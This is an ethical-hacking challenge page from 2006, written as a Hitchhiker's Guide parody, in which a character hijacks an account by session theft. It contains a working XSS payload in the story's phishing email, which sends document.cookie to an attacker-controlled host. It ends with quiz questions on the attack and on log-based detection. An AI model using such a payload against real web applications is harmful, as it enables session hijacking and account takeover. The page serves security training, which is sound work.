The Hitch-Hacker’s Guide to the Galaxy

| November 1, 2006

New Skillz Challenge!

Active Image
Active Image del.icio.us

Discuss in Forums {mos_smf_discuss:Nov 06 – Hitch-Hackers Guide to the Galaxy}

Active Image"Don't Panic, challenge fans!  We have a new challenge for you, by my good buddy Jay Beale.  Match wits with the Vogons to help Core Prefect land a ride and score some choice sushi.  Have fun with this challenge, my dear readers!"

–Ed Skoudis
Intelguardians
Author, Counter Hack Reloaded

Please read Jay’s challenge, compose your answers, and e-mail them to skillz1106@ethicalhacker.net with the 'Subject: Skillz Submission' by November 30, 2006.  Mike will choose three winners in early December, who will receive an autographed copy of Ed's book, Malware: Fighting Malicious Code. We’ll award a prize to the best technical answer, another to the most creative technically correct answer, and a third will be drawn from all answers submitted, whether correct or not.  So, even if you cannot answer all of the questions, or aren’t sure about your ideas, go ahead and send in what you have.  You just might win the prize in the random draw category.

Feel free to discuss the scenario in the forums but PLEASE do not post your answers.
You wouldn't want someone else winning your prize, would you?

coreimpact2c.gif
Skillz Sponsored by Core Security Technologies

 

 Active Image

By Jay Beale

 

Core Prefect shot his hand straight up into the air, activating the electronic Thumb, a Sub-etha signaling device that indicated he was looking to hitchhike.  His signal would be picked up by every life form cool enough to listen, which luckily did not include the Vogons.  The dreaded Vogons were busy operating the demolition fleet that hovered above Earth.  Their commander’s voice boomed planet wide through any surface that could reasonably be expected to act as a speaker, as well as a few that couldn’t: “As you will no doubt be aware, the plans for development of the outlying regions of the Galaxy require the building of a hyperspatial express route through your star system, and regrettably your planet is one of those scheduled for demolition.  The process will take slightly less than two of your Earth minutes.  Thank you.”

Core hoped the Dentrassis were listening for his signal – they were his only hope.  The Vogons employed the Dentrassis as cooks on their ships and while the Vogons didn’t pick up hitchhikers, the Dentrassis were known to let a few on board just to cheese off the Vogons.

The Sub-etha hitchhiker request alarm blared suddenly, so loud that Dentrassis cook Zan Zeutrino dropped the slab of yellowtail sushi he was cutting right onto the floor. Cursing the loss of the fish and the wonderful mercury it provided, he picked up the radio.  Its screen showed coordinates for two hitchhikers requesting a ride.  Zeutrino thought, “what the heck? Maybe they’ll be sushi connoisseurs!” and set about to get the hitchhikers onboard.  The Vogons might pay well, but they had no appreciation for fine sushi…

Zeutrino started up a Galaxy-wide web browser on the kitchen’s wall computer.  The Vogons used Vogsworld, a COTS all-in-one web application that could manage everything on the ship, from calendaring to navigation to e-mail.  Zeutrino quickly sent an e-mail to the matter transference operator, one of the ugliest Vogons on the ship.

Zeutrino crafted the following e-mail for the Vogon:

To: mattertransference
Fr: Vogon Commander Jeltz
Subject: Guard promotion

You have been promoted to Guard Level 1.  This is a big promotion, including much screaming, stomping and throwing people out of airlocks.  Please report to the bridge for your papers and issuance of your new low-slung laser pistol, pictured here:

<script>document.write('<img
src=http://kitchen/pistol.gif?cookies='+escape(document.cookie)+'>')</script>

Zeutrino set up a mini web server on the kitchen wall computer, sent the e-mail, and waited for a request.

The request came in, along with some very useful data.  Zeutrino quickly connected to Vogsworld, logged in as himself and used the data to switch users to the Vogon matter transference officer’s account.  He surfed to the matter transference control page, configured it to beam up the hitchhikers, and quickly began preparing a special roll for them.

As Core Prefect and his human friend Amiga were beamed up onto the ship, Pal Homeran, a Vogon system administrator, was reading Vogsworld logs.  Unfortunately for the Hitchhikers, Vogons loved reading their logs, which made them very good system administrators.  Homeran had found a problem.  Clearly there had been an unauthorized beam-up just now.  He alerted his commander, who readied the Vogon Poetry of Doom…

Questions:

1) How did Zay Zeutrino gather the desired data to switch users to the Vogon matter transference officer’s user account?
2) How did Zeutrino switch users?
3) What might Pal Homeran have seen in his logs?
4) What should Zeutrino do next?
5) What should Pal Homeran do next?

 

Active Image 

Remember, please submit your answers to skillz1106@ethicalhacker.net with the Subject: 'Skillz Submission' by Nov 30, 2006. In early December, we’ll announce three winners, one from each of these categories:

·        Best technical answer
·        Most creative and technically correct answer
·        Random draw from all answers submitted, correct, incorrect, complete, partially complete, etc.

Each winner gets a copy of Malware: Fighting Malicious Code, autographed by author Ed Skoudis, congratulating you on your victory and amazing abilities!

And… by the way, what is the significance of the word count in Ed’s intro at the start of this challenge?

Category: Skillz

Comments are closed.